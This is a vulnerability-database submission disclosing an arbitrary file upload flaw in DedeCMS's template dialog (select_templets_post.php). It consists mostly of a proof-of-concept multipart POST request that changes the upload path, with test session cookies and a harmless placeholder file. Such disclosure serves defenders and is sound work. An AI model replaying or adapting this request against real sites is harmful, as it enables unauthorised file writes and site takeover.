Submit #206433: dedeCMS has a logic flaw that causes arbitrary file uploads (info)

Title: dedeCMS has a logic flaw that causes arbitrary file uploads
Description: POC

    POST /include/dialog/select_templets_post.php HTTP/1.1
    Host: dede.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------59698619541674634093520637807
    Content-Length: 821
    Origin: http://dede.com
    Connection: close
    Referer: http://dede.com/include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet
    Cookie: PHPSESSID=7aojpo4e5kuvg8g5jokphrds52; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=1b47eac98453ada5; DedeLoginTime=1693981005; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=3cfe4db1e215919a; _csrf_name_35a8e786=0925065ac6fc01dd9093ec5507d4c2b6; _csrf_name_35a8e7861BH21ANI1AGD297L1FF21LN02BGE1DNG=65437f2a75024ae2
    Upgrade-Insecure-Requests: 1

    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="activepath"

    /member
    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="f"

    form1.templet
    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="job"

    upload
    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="uploadfile"; filename="ez_pz.py.txt"
    Content-Type: text/x-python

    1
    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="filename"

    123.txt
    -----------------------------59698619541674634093520637807
    Content-Disposition: form-data; name="sb1"

    确定
    -----------------------------59698619541674634093520637807--
Source: https://github.com/bayuncao/DEDEcms
User: bayuncao (UID 50143)
Submission: 11/09/2023 06:45 (3 years ago)
Moderation: 16/09/2023 09:52 (5 days later)
Status: Accepted
VulDB entry: 239863 [DedeCMS up to 5.7.100 select_templets_post.php activepath privilege escalation]
Points: 20
